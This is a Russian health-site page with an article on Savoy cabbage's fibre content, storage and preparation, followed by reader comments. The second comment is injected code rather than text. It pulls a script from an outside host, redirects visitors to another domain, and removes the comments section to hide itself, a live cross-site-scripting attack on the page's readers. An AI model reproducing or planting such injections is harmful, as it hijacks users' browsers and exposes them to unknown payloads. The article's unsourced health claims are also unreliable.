Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Капуста с итальянским акц...  >>  Капуста с итальянским акцентом против запоров
 
Обратная связь
 

Капуста с итальянским акцентом против запоров

Размер шрифта
20 марта 2012 10:00
  • google_analytics: false
  • Нравится

Эту капусту начали выращивать крестьяне графства Савойского, откуда она распространилась по всему миру. Как правильно выбрать, как хранить и как приготовить савойскую капусту?

1

Полезные свойства

  • В савойской капусте много хлорофилла, сильного антиоксиданта.
  • Савойская капуста богата грубыми волокнами, которые не перевариваются, не всасываются. Вместе с разбухшим веществом из организма выводятся вредные вещества из организма, в том числе и 10-15% холестерина.
  • Благодаря грубой клетчатке эта капуста очень полезна для профилактики запоров.
  • Содержится в савойской капусте противоязвенный витамин У.

Пьедестал почета по содержанию грубых волокон:

Савойская – 3 г / 100 г
Белокочанная – 2 г /100 г
Краснокочанная – 1 г /100 г

Как выбрать

Нужно оценить внешний вид капусты: листья свежие и ярко-зеленые, а кочерыжка – крепкой.

Как хранить

Хранить нужно в холодильнике до 5°C не более 7 дней. При этом капусту не нужно предварительно мыть и заворачивать в ткань или бумагу.

Как готовить

Полезней всего савойская капуста в свежем виде в салате. Удалите верхние листья, более нежные нижние порежьте в салат. Листья капусты можно припустить в течение 1 минуты.

Рецепт голубцов из савойской капусты

Для приготовления голубцов понадобятся морковь, цуккини, лук. Нарезанные кубиками припущенные овощи поместить в листья и завернуть обычным для голубцов способом. Полить овощной подливой и подать к столу.

 

Сюжеты по теме:
Родственник из-за границы. Савойская капуста

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

21 марта 2012 в 14:45

Цитировать   |   Пожаловаться

содержание грубых, как говорите, волокон, очень сильно зависит от сорта даже у белокочанной капусты: у раннеспелой - их мало, у позднеспелой - очень много! А еще много волокон в пекинской капусте, почему с ней не сравниваете?

2 - zzzzzz

30 июня 2015 в 23:49

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.